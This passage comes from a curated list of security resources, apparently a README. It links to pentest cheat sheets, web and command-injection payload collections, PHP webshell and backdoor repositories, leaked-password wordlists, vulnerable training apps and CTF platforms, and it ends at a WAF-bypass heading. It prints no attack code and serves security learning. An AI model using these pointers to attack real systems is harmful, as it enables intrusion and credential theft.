href="https://github.com/The-Art-of-Hacking/h4cker"><b>Cyber Security Resources</b></a> - includes thousands of cybersecurity-related references and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jhaddix/pentest-bookmarks"><b>Pentest Bookmarks</b></a> - there are a LOT of pentesting blogs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OlivierLaflamme/Cheatsheet-God"><b>Cheatsheet-God</b></a> - Penetration Testing Reference Bank - OSCP/PTP & PTX Cheatsheet.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Cyb3rWard0g/ThreatHunter-Playbook"><b>ThreatHunter-Playbook</b></a> - to aid the development of techniques and hypothesis for hunting campaigns.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/hmaverickadams/Beginner-Network-Pentesting"><b>Beginner-Network-Pentesting</b></a> - notes for beginner network pentesting course.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rewardone/OSCPRepo"><b>OSCPRepo</b></a> - is a list of resources that author have been gathering in preparation for the OSCP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/swisskyrepo/PayloadsAllTheThings"><b>PayloadsAllTheThings</b></a> - a list of useful payloads and bypass for Web Application Security and Pentest/CTF.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/foospidy/payloads"><b>payloads</b></a> - git all the Payloads! A collection of web attack payloads.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/payloadbox/command-injection-payload-list"><b>command-injection-payload-list</b></a> - command injection payload list.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/s0md3v/AwesomeXSS"><b>AwesomeXSS</b></a> - is a collection of Awesome XSS resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/JohnTroony/php-webshells"><b>php-webshells</b></a> - common php webshells.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/"><b>Pentesting Tools Cheat Sheet</b></a> - a quick reference high level overview for typical penetration testing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cheatsheetseries.owasp.org/"><b>OWASP Cheat Sheet Series</b></a> - is a collection of high value information on specific application security topics.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jeremylong.github.io/DependencyCheck/index.html"><b>OWASP dependency-check</b></a> - is an open source solution the OWASP Top 10 2013 entry.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Proactive_Controls"><b>OWASP ProActive Controls</b></a> - OWASP Top 10 Proactive Controls 2018.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE"><b>PENTESTING-BIBLE</b></a> - hacking & penetration testing & red team & cyber security & computer science resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/nixawk/pentest-wiki"><b>pentest-wiki</b></a> - is a free online security knowledge library for pentesters/researchers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://media.defcon.org/"><b>DEF CON Media Server</b></a> - great stuff from DEFCON.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rshipp/awesome-malware-analysis"><b>Awesome Malware Analysis</b></a> - a curated list of awesome malware analysis tools and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/"><b>SQL Injection Cheat Sheet</b></a> - detailed technical information about the many different variants of the SQL Injection.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://kb.entersoft.co.in/"><b>Entersoft Knowledge Base</b></a> - great and detailed reference about vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://html5sec.org/"><b>HTML5 Security Cheatsheet</b></a> - a collection of HTML5 related XSS attack vectors.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://evuln.com/tools/xss-encoder/"><b>XSS String Encoder</b></a> - for generating XSS code to check your input validation filters against XSS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gtfobins.github.io/"><b>GTFOBins</b></a> - list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://guif.re/"><b>Guifre Ruiz Notes</b></a> - collection of security, system, network and pentest cheatsheets.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://blog.safebuff.com/2016/07/03/SSRF-Tips/index.html"><b>SSRF Tips</b></a> - a collection of SSRF Tips.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://shell-storm.org/repo/CTF/"><b>shell-storm repo CTF</b></a> - great archive of CTFs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bl4de/ctf"><b>ctf</b></a> - CTF (Capture The Flag) writeups, code snippets, notes, scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/orangetw/My-CTF-Web-Challenges"><b>My-CTF-Web-Challenges</b></a> - collection of CTF Web challenges.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OWASP/owasp-mstg"><b>MSTG</b></a> - The Mobile Security Testing Guide (MSTG) is a comprehensive manual for mobile app security testing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/sdcampbell/Internal-Pentest-Playbook"><b>Internal-Pentest-Playbook</b></a> - notes on the most common things for an Internal Network Penetration Test.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/streaak/keyhacks"><b>KeyHacks</b></a> - shows quick ways in which API keys leaked by a bug bounty program can be checked.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/securitum/research"><b>securitum/research</b></a> - various Proof of Concepts of security research performed by Securitum.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/juliocesarfort/public-pentesting-reports"><b>public-pentesting-reports</b></a> - is a list of public pentest reports released by several consulting security groups.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/djadmin/awesome-bug-bounty"><b>awesome-bug-bounty</b></a> - is a comprehensive curated list of available Bug Bounty.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ngalongc/bug-bounty-reference"><b>bug-bounty-reference</b></a> - is a list of bug bounty write-ups.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/devanshbatham/Awesome-Bugbounty-Writeups"><b>Awesome-Bugbounty-Writeups</b></a> - is a curated list of bugbounty writeups.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pentester.land/list-of-bug-bounty-writeups.html"><b>Bug bounty writeups</b></a> - list of bug bounty writeups (2012-2020).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hackso.me/"><b>hackso.me</b></a> - a great journey into security.<br> </p> ##### :black_small_square: Backdoors/exploits <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bartblaze/PHP-backdoors"><b>PHP-backdoors</b></a> - a collection of PHP backdoors. For educational or testing purposes only.<br> </p> ##### :black_small_square: Wordlists and Weak passwords <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://weakpass.com/"><b>Weakpass</b></a> - for any kind of bruteforce find wordlists or unleash the power of them all at once!<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hashes.org/"><b>Hashes.org</b></a> - is a free online hash resolving service incorporating many unparalleled techniques.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/danielmiessler/SecLists"><b>SecLists</b></a> - collection of multiple types of lists used during security assessments, collected in one place.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/berzerk0/Probable-Wordlists"><b>Probable-Wordlists</b></a> - sorted by probability originally created for password generation and testing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.skullsecurity.org/index.php?title=Passwords"><b>skullsecurity passwords</b></a> - password dictionaries and leaked passwords repository.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://bezpieka.org/polski-slownik-premium-polish-wordlist"><b>Polish PREMIUM Dictionary</b></a> - official dictionary created by the team on the forum bezpieka.org.<b>*</b> <sup><a href="https://sourceforge.net/projects/kali-linux/files/Wordlist/">1</sup><br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/insidetrust/statistically-likely-usernames"><b>statistically-likely-usernames</b></a> - wordlists for creating statistically likely username lists.<br> </p> ##### :black_small_square: Bounty platforms <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.yeswehack.com/"><b>YesWeHack</b></a> - bug bounty platform with infosec jobs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.openbugbounty.org/"><b>Openbugbounty</b></a> - allows any security researcher reporting a vulnerability on any website.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackerone.com/"><b>hackerone</b></a> - global hacker community to surface the most relevant security issues.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.bugcrowd.com/"><b>bugcrowd</b></a> - crowdsourced cybersecurity for the enterprise.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://crowdshield.com/"><b>Crowdshield</b></a> - crowdsourced security & bug bounty management.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.synack.com/"><b>Synack</b></a> - crowdsourced security & bug bounty programs, crowd security intelligence platform, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hacktrophy.com/en/"><b>Hacktrophy</b></a> - bug bounty platform.<br> </p> ##### :black_small_square: Web Training Apps (local installation) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project"><b>OWASP-VWAD</b></a> - comprehensive and well maintained registry of all known vulnerable web applications.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.dvwa.co.uk/"><b>DVWA</b></a> - PHP/MySQL web application that is damn vulnerable.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://metasploit.help.rapid7.com/docs/metasploitable-2"><b>metasploitable2</b></a> - vulnerable web application amongst security researchers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rapid7/metasploitable3"><b>metasploitable3</b></a> - is a VM that is built from the ground up with a large amount of security vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/stamparm/DSVW"><b>DSVW</b></a> - is a deliberately vulnerable web application written in under 100 lines of code.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sourceforge.net/projects/mutillidae/"><b>OWASP Mutillidae II</b></a> - free, open source, deliberately vulnerable web-application.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Juice_Shop_Project"><b>OWASP Juice Shop Project</b></a> - the most bug-free vulnerable application in existence.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project"><b>OWASP Node js Goat Project</b></a> - OWASP Top 10 security risks apply to web apps developed using Node.js.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/iteratec/juicy-ctf"><b>juicy-ctf</b></a> - run Capture the Flags and Security Trainings with OWASP Juice Shop.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OWASP/SecurityShepherd"><b>SecurityShepherd</b></a> - web and mobile application security training platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/opendns/Security_Ninjas_AppSec_Training"><b>Security Ninjas</b></a> - open source application security training program.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rapid7/hackazon"><b>hackazon</b></a> - a modern vulnerable web app.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/appsecco/dvna"><b>dvna</b></a> - damn vulnerable NodeJS application.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/DefectDojo/django-DefectDojo"><b>django-DefectDojo</b></a> - is an open-source application vulnerability correlation and security orchestration tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://google-gruyere.appspot.com/"><b>Google Gruyere</b></a> - web application exploits and defenses.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/amolnaik4/bodhi"><b>Bodhi</b></a> - is a playground focused on learning the exploitation of client-side web vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://websploit.h4cker.org/"><b>Websploit</b></a> - single vm lab with the purpose of combining several vulnerable appliations in one environment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/vulhub/vulhub"><b>vulhub</b></a> - pre-built Vulnerable Environments based on docker-compose.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://rhinosecuritylabs.com/aws/introducing-cloudgoat-2/"><b>CloudGoat 2</b></a> - the new & improved "Vulnerable by Design" AWS deployment tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/globocom/secDevLabs"><b>secDevLabs</b></a> - is a laboratory for learning secure web development in a practical manner.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/incredibleindishell/CORS-vulnerable-Lab"><b>CORS-vulnerable-Lab</b></a> - sample vulnerable code and its exploit code.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/moloch--/RootTheBox"><b>RootTheBox</b></a> - a Game of Hackers (CTF Scoreboard & Game Manager).<br> </p> ##### :black_small_square: Labs (ethical hacking platforms/trainings/CTFs) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.offensive-security.com/"><b>Offensive Security</b></a> - true performance-based penetration testing training for over a decade.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackthebox.eu/"><b>Hack The Box</b></a> - online platform allowing you to test your penetration testing skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hacking-lab.com/index.html"><b>Hacking-Lab</b></a> - online ethical hacking, computer network and security challenge platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://pwnable.kr/index.php"><b>pwnable.kr</b></a> - non-commercial wargame site which provides various pwn challenges.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pwnable.tw/"><b>Pwnable.tw</b></a> - is a wargame site for hackers to test and expand their binary exploiting skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://picoctf.com/"><b>picoCTF</b></a> - is a free computer security game targeted at middle and high school students.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ctflearn.com/"><b>CTFlearn</b></a> - is an online platform built to help ethical hackers learn and practice their cybersecurity knowledge.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ctftime.org/"><b>ctftime</b></a> - CTF archive and a place, where you can get some another CTF-related info.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://silesiasecuritylab.com/"><b>Silesia Security Lab</b></a> - high quality security testing services.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://practicalpentestlabs.com/"><b>Practical Pentest Labs</b></a> - pentest lab, take your Hacking skills to the next level.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.root-me.org/?lang=en"><b>Root Me</b></a> - the fast, easy, and affordable way to train your hacking skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://rozwal.to/login"><b>rozwal.to</b></a> - a great platform to train your pentesting skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tryhackme.com/"><b>TryHackMe</b></a> - learning Cyber Security made easy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hackxor.net/"><b>hackxor</b></a> - is a realistic web application hacking game, designed to help players of all abilities develop their skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://hack-yourself-first.com/"><b>Hack Yourself First</b></a> - it's full of nasty app sec holes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://overthewire.org/wargames/"><b>OverTheWire</b></a> - can help you to learn and practice security concepts in the form of fun-filled games.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://labs.wizard-security.net/"><b>Wizard Labs</b></a> - is an online Penetration Testing Lab.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pentesterlab.com/"><b>PentesterLab</b></a> - provides vulnerable systems that can be used to test and understand vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ringzer0ctf.com/"><b>RingZer0</b></a> - tons of challenges designed to test and improve your hacking skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.try2hack.nl/"><b>try2hack</b></a> - several security-oriented challenges for your entertainment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ubeeri.com/preconfig-labs"><b>Ubeeri</b></a> - preconfigured lab environments.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lab.pentestit.ru/"><b>Pentestit</b></a> - emulate IT infrastructures of real companies for legal pen testing and improving pentest skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://microcorruption.com/login"><b>Microcorruption</b></a> - reversal challenges done in the web interface.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://crackmes.one/"><b>Crackmes</b></a> - download crackmes to help improve your reverse engineering skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://domgo.at/cxss/intro"><b>DomGoat</b></a> - DOM XSS security learning and practicing platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://chall.stypr.com"><b>Stereotyped Challenges</b></a> - upgrade your web hacking techniques today!<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.vulnhub.com/"><b>Vulnhub</b></a> - allows anyone to gain practical 'hands-on' experience in digital security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://w3challs.com/"><b>W3Challs</b></a> - is a penetration testing training platform, which offers various computer challenges.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ringzer0ctf.com/challenges"><b>RingZer0 CTF</b></a> - offers you tons of challenges designed to test and improve your hacking skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hack.me/"><b>Hack.me</b></a> - a platform where you can build, host and share vulnerable web apps for educational purposes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackthis.co.uk/levels/"><b>HackThis!</b></a> - discover how hacks, dumps and defacements are performed and secure your website.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.enigmagroup.org/#"><b>Enigma Group WebApp Training</b></a> - these challenges cover the exploits listed in the OWASP Top 10 Project.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://challenges.re/"><b>Reverse Engineering Challenges</b></a> - challenges, exercises, problems and tasks - by level, by type, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://0x00sec.org/"><b>0x00sec</b></a> - the home of the Hacker - Malware, Reverse Engineering, and Computer Science.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.wechall.net/challs"><b>We Chall</b></a> - there are exist a lots of different challenge types.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackergateway.com/"><b>Hacker Gateway</b></a> - is the go-to place for hackers who want to test their skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hacker101.com/"><b>Hacker101</b></a> - is a free class for web security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://contained.af/"><b>contained.af</b></a> - a stupid game for learning about containers, capabilities, and syscalls.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://flaws.cloud/"><b>flAWS challenge!</b></a> - a series of levels you'll learn about common mistakes and gotchas when using AWS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cybersecurity.wtf"><b>CyberSec WTF</b></a> - provides web hacking challenges derived from bounty write-ups.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ctfchallenge.co.uk/login"><b>CTF Challenge</b></a> - CTF Web App challenges.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://capturetheflag.withgoogle.com"><b>gCTF</b></a> - most of the challenges used in the Google CTF 2017.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackthissite.org/pages/index/index.php"><b>Hack This Site</b></a> - is a free, safe and legal training ground for hackers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://attackdefense.com"><b>Attack & Defense</b></a> - is a browser-based cloud labs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cryptohack.org/"><b>Cryptohack</b></a> - a fun platform for learning modern cryptography.<br> </p> ##### :black_small_square: CTF platforms <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/facebook/fbctf"><b>fbctf</b></a> - platform to host Capture the Flag competitions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/ctfscoreboard"><b>ctfscoreboard</b></a> - scoreboard for Capture The Flag competitions.<br> </p> ##### :black_small_square: Other resources <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bugcrowd/bugcrowd_university"><b>Bugcrowd University</b></a> - open source education content for the researcher community.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rewardone/OSCPRepo"><b>OSCPRepo</b></a> - a list of resources and scripts that I have been gathering in preparation for the OSCP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://medium.com/@cxosmo/owasp-top-10-real-world-examples-part-1-a540c4ea2df5"><b>OWASP Top 10: Real-World Examples</b></a> - test your web apps with real-world examples (two-part series).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://phrack.org/index.html"><b>phrack.org</b></a> - an awesome collection of articles from several respected hackers and other thinkers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Gr1mmie/Practical-Ethical-Hacking-Resources"><b>Practical-Ethical-Hacking-Resources</b></a> - compilation of resources from TCM's Udemy Course.<br> </p> #### Your daily knowledge and news &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: RSS Readers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://feedly.com/"><b>Feedly</b></a> - organize, read and share what matters to you.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.inoreader.com/"><b>Inoreader</b></a> - similar to feedly with a support for filtering what you fetch from rss.<br> </p> ##### :black_small_square: IRC Channels <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.hackerspaces.org/IRC_Channel"><b>#hackerspaces</b></a> - hackerspace IRC channels.<br> </p> ##### :black_small_square: Security <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://thehackernews.com/"><b>The Hacker News</b></a> - leading news source dedicated to promoting awareness for security experts and hackers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://latesthackingnews.com/"><b>Latest Hacking News</b></a> - provides the latest hacking news, exploits and vulnerabilities for ethical hackers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securitynewsletter.co/"><b>Security Newsletter</b></a> - security news as a weekly digest (email notifications).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://security.googleblog.com/"><b>Google Online Security Blog</b></a> - the latest news and insights from Google on security and safety on the Internet.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.qualys.com/"><b>Qualys Blog</b></a> - expert network security guidance and news.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.darkreading.com/"><b>DARKReading</b></a> - connecting the Information Security Community.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.darknet.org.uk/"><b>Darknet</b></a> - latest hacking tools, hacker news, cybersecurity best practices, ethical hacking & pen-testing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://twitter.com/disclosedh1"><b>publiclyDisclosed</b></a> - public disclosure watcher who keeps you up to date about the recently disclosed bugs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.reddit.com/r/hacking/"><b>Reddit - Hacking</b></a> - a subreddit dedicated to hacking and hackers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://packetstormsecurity.com/"><b>Packet Storm</b></a> - information security services, news, files, tools, exploits, advisories and whitepapers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sekurak.pl/"><b>Sekurak</b></a> - about security, penetration tests, vulnerabilities and many others (PL/EN).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nfsec.pl/"><b>nf.sec</b></a> - basic aspects and mechanisms of Linux operating system security (PL).<br> </p> ##### :black_small_square: Other/All-in-one <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://changelog.com/"><b>Changelog</b></a> - is a community of hackers; news & podcasts for developers and hackers.<br> </p> #### Other Cheat Sheets &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ###### Build your own DNS Servers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://calomel.org/unbound_dns.html"><b>Unbound DNS Tutorial</b></a> - a validating, recursive, and caching DNS server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ctrl.blog/entry/knot-dns-resolver-tutorial.html"><b>Knot Resolver on Fedora</b></a> - how to get faster and more secure DNS resolution with Knot Resolver on Fedora.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.aaflalo.me/2018/10/tutorial-setup-dns-over-https-server/"><b>DNS-over-HTTPS</b></a> - tutorial to setup your own DNS-over-HTTPS (DoH) server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hacks.mozilla.org/2018/05/a-cartoon-intro-to-dns-over-https/"><b>dns-over-https</b></a> - a cartoon intro to DNS over HTTPS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.aaflalo.me/2019/03/dns-over-tls/"><b>DNS-over-TLS</b></a> - following to your DoH server, setup your DNS-over-TLS (DoT) server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://zwischenzugs.com/2018/01/26/how-and-why-i-run-my-own-dns-servers/"><b>DNS Servers</b></a> - how (and why) i run my own DNS Servers.<br> </p> ###### Build your own Certificate Authority <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jamielinux.com/docs/openssl-certificate-authority/"><b>OpenSSL Certificate Authority</b></a> - build your own certificate authority (CA) using the OpenSSL tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/smallstep/certificates"><b>step-ca Certificate Authority</b></a> - build your own certificate authority (CA) using open source step-ca.<br> </p> ###### Build your own System/Virtual Machine <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/cfenollosa/os-tutorial"><b>os-tutorial</b></a> - how to create an OS from scratch.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://justinmeiners.github.io/lc3-vm/"><b>Write your Own Virtual Machine</b></a> - how to write your own virtual machine (VM).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/cirosantilli/x86-bare-metal-examples"><b>x86 Bare Metal Examples</b></a> - dozens of minimal operating systems to learn x86 system programming.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/djhworld/simple-computer"><b>simple-computer</b></a> - the scott CPU from "But How Do It Know?" by J. Clark Scott.<br> </p> ###### DNS Servers list (privacy) | <b><u>IP</u></b> | <b><u>URL</u></b> | | :--- | :--- | | **`84.200.69.80`** | [dns.watch](https://dns.watch/) | | **`94.247.43.254`** | [opennic.org](https://www.opennic.org/) | | **`64.6.64.6`** | [verisign.com](https://www.verisign.com/en_US/security-services/public-dns/index.xhtml) | | **`89.233.43.71`** | [censurfridns.dk](https://blog.uncensoreddns.org/) | | **`1.1.1.1`** | [cloudflare.com](https://1.1.1.1/) | | **`94.130.110.185`** | [dnsprivacy.at](https://dnsprivacy.at/) | ###### TOP Browser extensions | <b><u>Extension name</u></b> | <b><u>Description</u></b> | | :--- | :--- | | **`IPvFoo`** | Display the server IP address and HTTPS information across all page elements. | | **`FoxyProxy`** | Simplifies configuring browsers to access proxy-servers. | | **`HTTPS Everywhere`** | Automatically use HTTPS security on many sites. | | **`uMatrix`** | Point & click to forbid/allow any class of requests made by your browser. | | **`uBlock Origin`** | An efficient blocker: easy on memory and CPU footprint. | | **`Session Buddy`** | Manage browser tabs and bookmarks with ease. | | **`SuperSorter`** | Sort bookmarks recursively, delete duplicates, merge folders, and more. | | **`Clear Cache`** | Clear your cache and browsing data. | | **`d3coder`** | Encoding/Decoding plugin for various types of encoding. | | **`Web Developer`** | Adds a toolbar button with various web developer tools. | | **`ThreatPinch Lookup`** | Add threat intelligence hover tool tips. | ###### TOP Burp extensions | <b><u>Extension name</u></b> | <b><u>Description</u></b> | | :--- | :--- | | **`Active Scan++`** | Extends Burp's active and passive scanning capabilities. | | **`Autorize`** | Automatically detects authorization enforcement. | | **`AuthMatrix`** | A simple matrix grid to define the desired levels of access privilege. | | **`Logger++`** | Logs requests and responses for all Burp tools in a sortable table. | | **`Bypass WAF`** | Adds headers useful for bypassing some WAF devices. | | **`JSON Beautifier`** | Beautifies JSON content in the HTTP message viewer. | | **`JSON Web Tokens`** | Enables Burp to decode and manipulate JSON web tokens. | | **`CSP Auditor`** | Displays CSP headers for responses, and passively reports CSP weaknesses. | | **`CSP-Bypass`** | Passively scans for CSP headers that contain known bypasses. | | **`Hackvertor`** | Converts data using a tag-based configuration to apply various encoding. | | **`HTML5 Auditor`** | Scans for usage of risky HTML5 features. | | **`Software Vulnerability Scanner`** | Vulnerability scanner based on vulners.com audit API. | | **`Turbo Intruder`** | Is a powerful bruteforcing tool. | | **`Upload Scanner`** | Upload a number of different file types, laced with different forms of payload. | ###### Hack Mozilla Firefox address bar In Firefox's address bar, you can limit results by typing special characters before or after your term: - `^` - for matches in your browsing history - `*` - for matches in your bookmarks. - `%` - for matches in your currently open tabs. - `#` - for matches in page titles. - `@` - for matches in web addresses. ###### Chrome hidden commands - `chrome://chrome-urls` - list of all commands - `chrome://flags` - enable experiments and development features - `chrome://interstitials` - errors and warnings - `chrome://net-internals` - network internals (events, dns, cache) - `chrome://network-errors` - network errors - `chrome://net-export` - start logging future network activity to a file - `chrome://safe-browsing` - safe browsing options - `chrome://user-actions` - record all user actions - `chrome://restart` - restart chrome - `chrome://dino` - ERR_INTERNET_DISCONNECTED... - `cache:<website-address>` - view the cached version of the web page ###### Bypass WAFs by 